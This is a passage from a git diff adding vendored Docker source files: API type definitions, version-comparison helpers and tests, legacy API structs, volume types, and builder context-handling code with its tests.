+	// ID is the id of the created secret.
+	ID string
+}
+
+// SecretListOptions holds parameters to list secrets
+type SecretListOptions struct {
+	Filters filters.Args
+}
diff --git a/vendor/github.com/docker/docker/api/types/versions/README.md b/vendor/github.com/docker/docker/api/types/versions/README.md
new file mode 100644
index 0000000000..cdac50a53c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/versions/README.md
@@ -0,0 +1,14 @@
+## Legacy API type versions
+
+This package includes types for legacy API versions. The stable version of the API types live in `api/types/*.go`.
+
+Consider moving a type here when you need to keep backwards compatibility in the API. This legacy types are organized by the latest API version they appear in. For instance, types in the `v1p19` package are valid for API versions below or equal `1.19`. Types in the `v1p20` package are valid for the API version `1.20`, since the versions below that will use the legacy types in `v1p19`.
+
+### Package name conventions
+
+The package name convention is to use `v` as a prefix for the version number and `p`(patch) as a separator. We use this nomenclature due to a few restrictions in the Go package name convention:
+
+1. We cannot use `.` because it's interpreted by the language, think of `v1.20.CallFunction`.
+2. We cannot use `_` because golint complains about it. The code is actually valid, but it looks probably more weird: `v1_20.CallFunction`.
+
+For instance, if you want to modify a type that was available in the version `1.21` of the API but it will have different fields in the version `1.22`, you want to create a new package under `api/types/versions/v1p21`.
diff --git a/vendor/github.com/docker/docker/api/types/versions/compare.go b/vendor/github.com/docker/docker/api/types/versions/compare.go
new file mode 100644
index 0000000000..611d4fed66
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/versions/compare.go
@@ -0,0 +1,62 @@
+package versions
+
+import (
+	"strconv"
+	"strings"
+)
+
+// compare compares two version strings
+// returns -1 if v1 < v2, 1 if v1 > v2, 0 otherwise.
+func compare(v1, v2 string) int {
+	var (
+		currTab  = strings.Split(v1, ".")
+		otherTab = strings.Split(v2, ".")
+	)
+
+	max := len(currTab)
+	if len(otherTab) > max {
+		max = len(otherTab)
+	}
+	for i := 0; i < max; i++ {
+		var currInt, otherInt int
+
+		if len(currTab) > i {
+			currInt, _ = strconv.Atoi(currTab[i])
+		}
+		if len(otherTab) > i {
+			otherInt, _ = strconv.Atoi(otherTab[i])
+		}
+		if currInt > otherInt {
+			return 1
+		}
+		if otherInt > currInt {
+			return -1
+		}
+	}
+	return 0
+}
+
+// LessThan checks if a version is less than another
+func LessThan(v, other string) bool {
+	return compare(v, other) == -1
+}
+
+// LessThanOrEqualTo checks if a version is less than or equal to another
+func LessThanOrEqualTo(v, other string) bool {
+	return compare(v, other) <= 0
+}
+
+// GreaterThan checks if a version is greater than another
+func GreaterThan(v, other string) bool {
+	return compare(v, other) == 1
+}
+
+// GreaterThanOrEqualTo checks if a version is greater than or equal to another
+func GreaterThanOrEqualTo(v, other string) bool {
+	return compare(v, other) >= 0
+}
+
+// Equal checks if a version is equal to another
+func Equal(v, other string) bool {
+	return compare(v, other) == 0
+}
diff --git a/vendor/github.com/docker/docker/api/types/versions/compare_test.go b/vendor/github.com/docker/docker/api/types/versions/compare_test.go
new file mode 100644
index 0000000000..c2b96869f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/versions/compare_test.go
@@ -0,0 +1,26 @@
+package versions
+
+import (
+	"testing"
+)
+
+func assertVersion(t *testing.T, a, b string, result int) {
+	if r := compare(a, b); r != result {
+		t.Fatalf("Unexpected version comparison result. Found %d, expected %d", r, result)
+	}
+}
+
+func TestCompareVersion(t *testing.T) {
+	assertVersion(t, "1.12", "1.12", 0)
+	assertVersion(t, "1.0.0", "1", 0)
+	assertVersion(t, "1", "1.0.0", 0)
+	assertVersion(t, "1.05.00.0156", "1.0.221.9289", 1)
+	assertVersion(t, "1", "1.0.1", -1)
+	assertVersion(t, "1.0.1", "1", 1)
+	assertVersion(t, "1.0.1", "1.0.2", -1)
+	assertVersion(t, "1.0.2", "1.0.3", -1)
+	assertVersion(t, "1.0.3", "1.1", -1)
+	assertVersion(t, "1.1", "1.1.1", -1)
+	assertVersion(t, "1.1.1", "1.1.2", -1)
+	assertVersion(t, "1.1.2", "1.2", -1)
+}
diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
new file mode 100644
index 0000000000..dc13150545
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
@@ -0,0 +1,35 @@
+// Package v1p19 provides specific API types for the API version 1, patch 19.
+package v1p19
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/versions/v1p20"
+	"github.com/docker/go-connections/nat"
+)
+
+// ContainerJSON is a backcompatibility struct for APIs prior to 1.20.
+// Note this is not used by the Windows daemon.
+type ContainerJSON struct {
+	*types.ContainerJSONBase
+	Volumes         map[string]string
+	VolumesRW       map[string]bool
+	Config          *ContainerConfig
+	NetworkSettings *v1p20.NetworkSettings
+}
+
+// ContainerConfig is a backcompatibility struct for APIs prior to 1.20.
+type ContainerConfig struct {
+	*container.Config
+
+	MacAddress      string
+	NetworkDisabled bool
+	ExposedPorts    map[nat.Port]struct{}
+
+	// backward compatibility, they now live in HostConfig
+	VolumeDriver string
+	Memory       int64
+	MemorySwap   int64
+	CPUShares    int64  `json:"CpuShares"`
+	CPUSet       string `json:"Cpuset"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
new file mode 100644
index 0000000000..94a06d7452
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
@@ -0,0 +1,40 @@
+// Package v1p20 provides specific API types for the API version 1, patch 20.
+package v1p20
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/go-connections/nat"
+)
+
+// ContainerJSON is a backcompatibility struct for the API 1.20
+type ContainerJSON struct {
+	*types.ContainerJSONBase
+	Mounts          []types.MountPoint
+	Config          *ContainerConfig
+	NetworkSettings *NetworkSettings
+}
+
+// ContainerConfig is a backcompatibility struct used in ContainerJSON for the API 1.20
+type ContainerConfig struct {
+	*container.Config
+
+	MacAddress      string
+	NetworkDisabled bool
+	ExposedPorts    map[nat.Port]struct{}
+
+	// backward compatibility, they now live in HostConfig
+	VolumeDriver string
+}
+
+// StatsJSON is a backcompatibility struct used in Stats for APIs prior to 1.21
+type StatsJSON struct {
+	types.Stats
+	Network types.NetworkStats `json:"network,omitempty"`
+}
+
+// NetworkSettings is a backward compatible struct for APIs prior to 1.21
+type NetworkSettings struct {
+	types.NetworkSettingsBase
+	types.DefaultNetworkSettings
+}
diff --git a/vendor/github.com/docker/docker/api/types/volume.go b/vendor/github.com/docker/docker/api/types/volume.go
new file mode 100644
index 0000000000..da4f8ebd9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/volume.go
@@ -0,0 +1,58 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// Volume volume
+// swagger:model Volume
+type Volume struct {
+
+	// Name of the volume driver used by the volume.
+	// Required: true
+	Driver string `json:"Driver"`
+
+	// User-defined key/value metadata.
+	// Required: true
+	Labels map[string]string `json:"Labels"`
+
+	// Mount path of the volume on the host.
+	// Required: true
+	Mountpoint string `json:"Mountpoint"`
+
+	// Name of the volume.
+	// Required: true
+	Name string `json:"Name"`
+
+	// The driver specific options used when creating the volume.
+	// Required: true
+	Options map[string]string `json:"Options"`
+
+	// The level at which the volume exists. Either `global` for cluster-wide, or `local` for machine level.
+	// Required: true
+	Scope string `json:"Scope"`
+
+	// Low-level details about the volume, provided by the volume driver.
+	// Details are returned as a map with key/value pairs:
+	// `{"key":"value","key2":"value2"}`.
+	//
+	// The `Status` field is optional, and is omitted if the volume driver
+	// does not support this feature.
+	//
+	Status map[string]interface{} `json:"Status,omitempty"`
+
+	// usage data
+	UsageData *VolumeUsageData `json:"UsageData,omitempty"`
+}
+
+// VolumeUsageData volume usage data
+// swagger:model VolumeUsageData
+type VolumeUsageData struct {
+
+	// The number of containers referencing this volume.
+	// Required: true
+	RefCount int64 `json:"RefCount"`
+
+	// The disk space used by the volume (local driver only)
+	// Required: true
+	Size int64 `json:"Size"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_create.go b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go
new file mode 100644
index 0000000000..679c16006f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/volume/volumes_create.go
@@ -0,0 +1,29 @@
+package volume
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+// VolumesCreateBody volumes create body
+// swagger:model VolumesCreateBody
+type VolumesCreateBody struct {
+
+	// Name of the volume driver to use.
+	// Required: true
+	Driver string `json:"Driver"`
+
+	// A mapping of driver options and values. These options are passed directly to the driver and are driver specific.
+	// Required: true
+	DriverOpts map[string]string `json:"DriverOpts"`
+
+	// User-defined key/value metadata.
+	// Required: true
+	Labels map[string]string `json:"Labels"`
+
+	// The new volume's name. If not specified, Docker generates a name.
+	// Required: true
+	Name string `json:"Name"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_list.go b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go
new file mode 100644
index 0000000000..7770bcb8fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/volume/volumes_list.go
@@ -0,0 +1,23 @@
+package volume
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+import "github.com/docker/docker/api/types"
+
+// VolumesListOKBody volumes list o k body
+// swagger:model VolumesListOKBody
+type VolumesListOKBody struct {
+
+	// List of volumes
+	// Required: true
+	Volumes []*types.Volume `json:"Volumes"`
+
+	// Warnings that occurred when fetching the list of volumes
+	// Required: true
+	Warnings []string `json:"Warnings"`
+}
diff --git a/vendor/github.com/docker/docker/builder/builder.go b/vendor/github.com/docker/docker/builder/builder.go
new file mode 100644
index 0000000000..ced19e81e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder.go
@@ -0,0 +1,169 @@
+// Package builder defines interfaces for any Docker builder to implement.
+//
+// Historically, only server-side Dockerfile interpreters existed.
+// This package allows for other implementations of Docker builders.
+package builder
+
+import (
+	"io"
+	"os"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/reference"
+	"golang.org/x/net/context"
+)
+
+const (
+	// DefaultDockerfileName is the Default filename with Docker commands, read by docker build
+	DefaultDockerfileName string = "Dockerfile"
+)
+
+// Context represents a file system tree.
+type Context interface {
+	// Close allows to signal that the filesystem tree won't be used anymore.
+	// For Context implementations using a temporary directory, it is recommended to
+	// delete the temporary directory in Close().
+	Close() error
+	// Stat returns an entry corresponding to path if any.
+	// It is recommended to return an error if path was not found.
+	// If path is a symlink it also returns the path to the target file.
+	Stat(path string) (string, FileInfo, error)
+	// Open opens path from the context and returns a readable stream of it.
+	Open(path string) (io.ReadCloser, error)
+	// Walk walks the tree of the context with the function passed to it.
+	Walk(root string, walkFn WalkFunc) error
+}
+
+// WalkFunc is the type of the function called for each file or directory visited by Context.Walk().
+type WalkFunc func(path string, fi FileInfo, err error) error
+
+// ModifiableContext represents a modifiable Context.
+// TODO: remove this interface once we can get rid of Remove()
+type ModifiableContext interface {
+	Context
+	// Remove deletes the entry specified by `path`.
+	// It is usual for directory entries to delete all its subentries.
+	Remove(path string) error
+}
+
+// FileInfo extends os.FileInfo to allow retrieving an absolute path to the file.
+// TODO: remove this interface once pkg/archive exposes a walk function that Context can use.
+type FileInfo interface {
+	os.FileInfo
+	Path() string
+}
+
+// PathFileInfo is a convenience struct that implements the FileInfo interface.
+type PathFileInfo struct {
+	os.FileInfo
+	// FilePath holds the absolute path to the file.
+	FilePath string
+	// Name holds the basename for the file.
+	FileName string
+}
+
+// Path returns the absolute path to the file.
+func (fi PathFileInfo) Path() string {
+	return fi.FilePath
+}
+
+// Name returns the basename of the file.
+func (fi PathFileInfo) Name() string {
+	if fi.FileName != "" {
+		return fi.FileName
+	}
+	return fi.FileInfo.Name()
+}
+
+// Hashed defines an extra method intended for implementations of os.FileInfo.
+type Hashed interface {
+	// Hash returns the hash of a file.
+	Hash() string
+	SetHash(string)
+}
+
+// HashedFileInfo is a convenient struct that augments FileInfo with a field.
+type HashedFileInfo struct {
+	FileInfo
+	// FileHash represents the hash of a file.
+	FileHash string
+}
+
+// Hash returns the hash of a file.
+func (fi HashedFileInfo) Hash() string {
+	return fi.FileHash
+}
+
+// SetHash sets the hash of a file.
+func (fi *HashedFileInfo) SetHash(h string) {
+	fi.FileHash = h
+}
+
+// Backend abstracts calls to a Docker Daemon.
+type Backend interface {
+	// TODO: use digest reference instead of name
+
+	// GetImageOnBuild looks up a Docker image referenced by `name`.
+	GetImageOnBuild(name string) (Image, error)
+	// TagImage tags an image with newTag
+	TagImageWithReference(image.ID, reference.Named) error
+	// PullOnBuild tells Docker to pull image referenced by `name`.
+	PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (Image, error)
+	// ContainerAttachRaw attaches to container.
+	ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error
+	// ContainerCreate creates a new Docker container and returns potential warnings
+	ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
+	// ContainerRm removes a container specified by `id`.
+	ContainerRm(name string, config *types.ContainerRmConfig) error
+	// Commit creates a new Docker image from an existing Docker container.
+	Commit(string, *backend.ContainerCommitConfig) (string, error)
+	// ContainerKill stops the container execution abruptly.
+	ContainerKill(containerID string, sig uint64) error
+	// ContainerStart starts a new container
+	ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error
+	// ContainerWait stops processing until the given container is stopped.
+	ContainerWait(containerID string, timeout time.Duration) (int, error)
+	// ContainerUpdateCmdOnBuild updates container.Path and container.Args
+	ContainerUpdateCmdOnBuild(containerID string, cmd []string) error
+	// ContainerCreateWorkdir creates the workdir (currently only used on Windows)
+	ContainerCreateWorkdir(containerID string) error
+
+	// ContainerCopy copies/extracts a source FileInfo to a destination path inside a container
+	// specified by a container object.
+	// TODO: make an Extract method instead of passing `decompress`
+	// TODO: do not pass a FileInfo, instead refactor the archive package to export a Walk function that can be used
+	// with Context.Walk
+	// ContainerCopy(name string, res string) (io.ReadCloser, error)
+	// TODO: use copyBackend api
+	CopyOnBuild(containerID string, destPath string, src FileInfo, decompress bool) error
+
+	// HasExperimental checks if the backend supports experimental features
+	HasExperimental() bool
+
+	// SquashImage squashes the fs layers from the provided image down to the specified `to` image
+	SquashImage(from string, to string) (string, error)
+}
+
+// Image represents a Docker image used by the builder.
+type Image interface {
+	ImageID() string
+	RunConfig() *container.Config
+}
+
+// ImageCacheBuilder represents a generator for stateful image cache.
+type ImageCacheBuilder interface {
+	// MakeImageCache creates a stateful image cache.
+	MakeImageCache(cacheFrom []string) ImageCache
+}
+
+// ImageCache abstracts an image cache.
+// (parent image, child runconfig) -> child image
+type ImageCache interface {
+	// GetCachedImageOnBuild returns a reference to a cached image whose parent equals `parent`
+	// and runconfig equals `cfg`. A cache miss is expected to return an empty ID and a nil error.
+	GetCache(parentID string, cfg *container.Config) (imageID string, err error)
+}
diff --git a/vendor/github.com/docker/docker/builder/context.go b/vendor/github.com/docker/docker/builder/context.go
new file mode 100644
index 0000000000..600f42319b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/context.go
@@ -0,0 +1,260 @@
+package builder
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/gitutils"
+	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+)
+
+// ValidateContextDirectory checks if all the contents of the directory
+// can be read and returns an error if some files can't be read
+// symlinks which point to non-existing files don't trigger an error
+func ValidateContextDirectory(srcPath string, excludes []string) error {
+	contextRoot, err := getContextRoot(srcPath)
+	if err != nil {
+		return err
+	}
+	return filepath.Walk(contextRoot, func(filePath string, f os.FileInfo, err error) error {
+		if err != nil {
+			if os.IsPermission(err) {
+				return fmt.Errorf("can't stat '%s'", filePath)
+			}
+			if os.IsNotExist(err) {
+				return nil
+			}
+			return err
+		}
+
+		// skip this directory/file if it's not in the path, it won't get added to the context
+		if relFilePath, err := filepath.Rel(contextRoot, filePath); err != nil {
+			return err
+		} else if skip, err := fileutils.Matches(relFilePath, excludes); err != nil {
+			return err
+		} else if skip {
+			if f.IsDir() {
+				return filepath.SkipDir
+			}
+			return nil
+		}
+
+		// skip checking if symlinks point to non-existing files, such symlinks can be useful
+		// also skip named pipes, because they hanging on open
+		if f.Mode()&(os.ModeSymlink|os.ModeNamedPipe) != 0 {
+			return nil
+		}
+
+		if !f.IsDir() {
+			currentFile, err := os.Open(filePath)
+			if err != nil && os.IsPermission(err) {
+				return fmt.Errorf("no permission to read from '%s'", filePath)
+			}
+			currentFile.Close()
+		}
+		return nil
+	})
+}
+
+// GetContextFromReader will read the contents of the given reader as either a
+// Dockerfile or tar archive. Returns a tar archive used as a context and a
+// path to the Dockerfile inside the tar.
+func GetContextFromReader(r io.ReadCloser, dockerfileName string) (out io.ReadCloser, relDockerfile string, err error) {
+	buf := bufio.NewReader(r)
+
+	magic, err := buf.Peek(archive.HeaderSize)
+	if err != nil && err != io.EOF {
+		return nil, "", fmt.Errorf("failed to peek context header from STDIN: %v", err)
+	}
+
+	if archive.IsArchive(magic) {
+		return ioutils.NewReadCloserWrapper(buf, func() error { return r.Close() }), dockerfileName, nil
+	}
+
+	// Input should be read as a Dockerfile.
+	tmpDir, err := ioutil.TempDir("", "docker-build-context-")
+	if err != nil {
+		return nil, "", fmt.Errorf("unbale to create temporary context directory: %v", err)
+	}
+
+	f, err := os.Create(filepath.Join(tmpDir, DefaultDockerfileName))
+	if err != nil {
+		return nil, "", err
+	}
+	_, err = io.Copy(f, buf)
+	if err != nil {
+		f.Close()
+		return nil, "", err
+	}
+
+	if err := f.Close(); err != nil {
+		return nil, "", err
+	}
+	if err := r.Close(); err != nil {
+		return nil, "", err
+	}
+
+	tar, err := archive.Tar(tmpDir, archive.Uncompressed)
+	if err != nil {
+		return nil, "", err
+	}
+
+	return ioutils.NewReadCloserWrapper(tar, func() error {
+		err := tar.Close()
+		os.RemoveAll(tmpDir)
+		return err
+	}), DefaultDockerfileName, nil
+
+}
+
+// GetContextFromGitURL uses a Git URL as context for a `docker build`. The
+// git repo is cloned into a temporary directory used as the context directory.
+// Returns the absolute path to the temporary context directory, the relative
+// path of the dockerfile in that context directory, and a non-nil error on
+// success.
+func GetContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) {
+	if _, err := exec.LookPath("git"); err != nil {
+		return "", "", fmt.Errorf("unable to find 'git': %v", err)
+	}
+	if absContextDir, err = gitutils.Clone(gitURL); err != nil {
+		return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err)
+	}
+
+	return getDockerfileRelPath(absContextDir, dockerfileName)
+}
+
+// GetContextFromURL uses a remote URL as context for a `docker build`. The
+// remote resource is downloaded as either a Dockerfile or a tar archive.
+// Returns the tar archive used for the context and a path of the
+// dockerfile inside the tar.
+func GetContextFromURL(out io.Writer, remoteURL, dockerfileName string) (io.ReadCloser, string, error) {
+	response, err := httputils.Download(remoteURL)
+	if err != nil {
+		return nil, "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err)
+	}
+	progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(out, true)
+
+	// Pass the response body through a progress reader.
+	progReader := progress.NewProgressReader(response.Body, progressOutput, response.ContentLength, "", fmt.Sprintf("Downloading build context from remote url: %s", remoteURL))
+
+	return GetContextFromReader(ioutils.NewReadCloserWrapper(progReader, func() error { return response.Body.Close() }), dockerfileName)
+}
+
+// GetContextFromLocalDir uses the given local directory as context for a
+// `docker build`. Returns the absolute path to the local context directory,
+// the relative path of the dockerfile in that context directory, and a non-nil
+// error on success.
+func GetContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) {
+	// When using a local context directory, when the Dockerfile is specified
+	// with the `-f/--file` option then it is considered relative to the
+	// current directory and not the context directory.
+	if dockerfileName != "" {
+		if dockerfileName, err = filepath.Abs(dockerfileName); err != nil {
+			return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err)
+		}
+	}
+
+	return getDockerfileRelPath(localDir, dockerfileName)
+}
+
+// getDockerfileRelPath uses the given context directory for a `docker build`
+// and returns the absolute path to the context directory, the relative path of
+// the dockerfile in that context directory, and a non-nil error on success.
+func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) {
+	if absContextDir, err = filepath.Abs(givenContextDir); err != nil {
+		return "", "", fmt.Errorf("unable to get absolute context directory of given context directory %q: %v", givenContextDir, err)
+	}
+
+	// The context dir might be a symbolic link, so follow it to the actual
+	// target directory.
+	//
+	// FIXME. We use isUNC (always false on non-Windows platforms) to workaround
+	// an issue in golang. On Windows, EvalSymLinks does not work on UNC file
+	// paths (those starting with \\). This hack means that when using links
+	// on UNC paths, they will not be followed.
+	if !isUNC(absContextDir) {
+		absContextDir, err = filepath.EvalSymlinks(absContextDir)
+		if err != nil {
+			return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err)
+		}
+	}
+
+	stat, err := os.Lstat(absContextDir)
+	if err != nil {
+		return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err)
+	}
+
+	if !stat.IsDir() {
+		return "", "", fmt.Errorf("context must be a directory: %s", absContextDir)
+	}
+
+	absDockerfile := givenDockerfile
+	if absDockerfile == "" {
+		// No -f/--file was specified so use the default relative to the
+		// context directory.
+		absDockerfile = filepath.Join(absContextDir, DefaultDockerfileName)
+
+		// Just to be nice ;-) look for 'dockerfile' too but only
+		// use it if we found it, otherwise ignore this check
+		if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) {
+			altPath := filepath.Join(absContextDir, strings.ToLower(DefaultDockerfileName))
+			if _, err = os.Lstat(altPath); err == nil {
+				absDockerfile = altPath
+			}
+		}
+	}
+
+	// If not already an absolute path, the Dockerfile path should be joined to
+	// the base directory.
+	if !filepath.IsAbs(absDockerfile) {
+		absDockerfile = filepath.Join(absContextDir, absDockerfile)
+	}
+
+	// Evaluate symlinks in the path to the Dockerfile too.
+	//
+	// FIXME. We use isUNC (always false on non-Windows platforms) to workaround
+	// an issue in golang. On Windows, EvalSymLinks does not work on UNC file
+	// paths (those starting with \\). This hack means that when using links
+	// on UNC paths, they will not be followed.
+	if !isUNC(absDockerfile) {
+		absDockerfile, err = filepath.EvalSymlinks(absDockerfile)
+		if err != nil {
+			return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err)
+		}
+	}
+
+	if _, err := os.Lstat(absDockerfile); err != nil {
+		if os.IsNotExist(err) {
+			return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile)
+		}
+		return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err)
+	}
+
+	if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil {
+		return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err)
+	}
+
+	if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) {
+		return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir)
+	}
+
+	return absContextDir, relDockerfile, nil
+}
+
+// isUNC returns true if the path is UNC (one starting \\). It always returns
+// false on Linux.
+func isUNC(path string) bool {
+	return runtime.GOOS == "windows" && strings.HasPrefix(path, `\\`)
+}
diff --git a/vendor/github.com/docker/docker/builder/context_test.go b/vendor/github.com/docker/docker/builder/context_test.go
new file mode 100644
index 0000000000..27d29d79f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/context_test.go
@@ -0,0 +1,307 @@
+package builder
+
+import (
+	"archive/tar"
+	"bytes"
+	"io"
+	"io/ioutil"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/pkg/archive"
+)
+
+var prepareEmpty = func(t *testing.T) (string, func()) {
+	return "", func() {}
+}
+
+var prepareNoFiles = func(t *testing.T) (string, func()) {
+	return createTestTempDir(t, "", "builder-context-test")
+}
+
+var prepareOneFile = func(t *testing.T) (string, func()) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	return contextDir, cleanup
+}
+
+func testValidateContextDirectory(t *testing.T, prepare func(t *testing.T) (string, func()), excludes []string) {
+	contextDir, cleanup := prepare(t)
+	defer cleanup()
+
+	err := ValidateContextDirectory(contextDir, excludes)
+
+	if err != nil {
+		t.Fatalf("Error should be nil, got: %s", err)
+	}
+}
+
+func TestGetContextFromLocalDirNoDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
+
+	if err == nil {
+		t.Fatalf("Error should not be nil")
+	}
+
+	if absContextDir != "" {
+		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
+	}
+
+	if relDockerfile != "" {
+		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirNotExistingDir(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	fakePath := filepath.Join(contextDir, "fake")
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(fakePath, "")
+
+	if err == nil {
+		t.Fatalf("Error should not be nil")
+	}
+
+	if absContextDir != "" {
+		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
+	}
+
+	if relDockerfile != "" {
+		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirNotExistingDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	fakePath := filepath.Join(contextDir, "fake")
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, fakePath)
+
+	if err == nil {
+		t.Fatalf("Error should not be nil")
+	}
+
+	if absContextDir != "" {
+		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
+	}
+
+	if relDockerfile != "" {
+		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirWithNoDirectory(t *testing.T) {
+	contextDir, dirCleanup := createTestTempDir(t, "", "builder-context-test")
+	defer dirCleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	chdirCleanup := chdir(t, contextDir)
+	defer chdirCleanup()
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
+
+	if err != nil {
+		t.Fatalf("Error when getting context from local dir: %s", err)
+	}
+
+	if absContextDir != contextDir {
+		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
+	}
+
+	if relDockerfile != DefaultDockerfileName {
+		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirWithDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, "")
+
+	if err != nil {
+		t.Fatalf("Error when getting context from local dir: %s", err)
+	}
+
+	if absContextDir != contextDir {
+		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
+	}
+
+	if relDockerfile != DefaultDockerfileName {
+		t.Fatalf("Relative path to dockerfile should be equal to %s, got: %s", DefaultDockerfileName, relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirLocalFile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	testFilename := createTestTempFile(t, contextDir, "tmpTest", "test", 0777)
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(testFilename, "")
+
+	if err == nil {
+		t.Fatalf("Error should not be nil")
+	}
+
+	if absContextDir != "" {
+		t.Fatalf("Absolute directory path should be empty, got: %s", absContextDir)
+	}
+
+	if relDockerfile != "" {
+		t.Fatalf("Relative path to Dockerfile should be empty, got: %s", relDockerfile)
+	}
+}
+
+func TestGetContextFromLocalDirWithCustomDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-context-test")
+	defer cleanup()
+
+	chdirCleanup := chdir(t, contextDir)
+	defer chdirCleanup()
+
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	absContextDir, relDockerfile, err := GetContextFromLocalDir(contextDir, DefaultDockerfileName)
+
+	if err != nil {
+		t.Fatalf("Error when getting context from local dir: %s", err)
+	}
+
+	if absContextDir != contextDir {
+		t.Fatalf("Absolute directory path should be equal to %s, got: %s", contextDir, absContextDir)
+	}
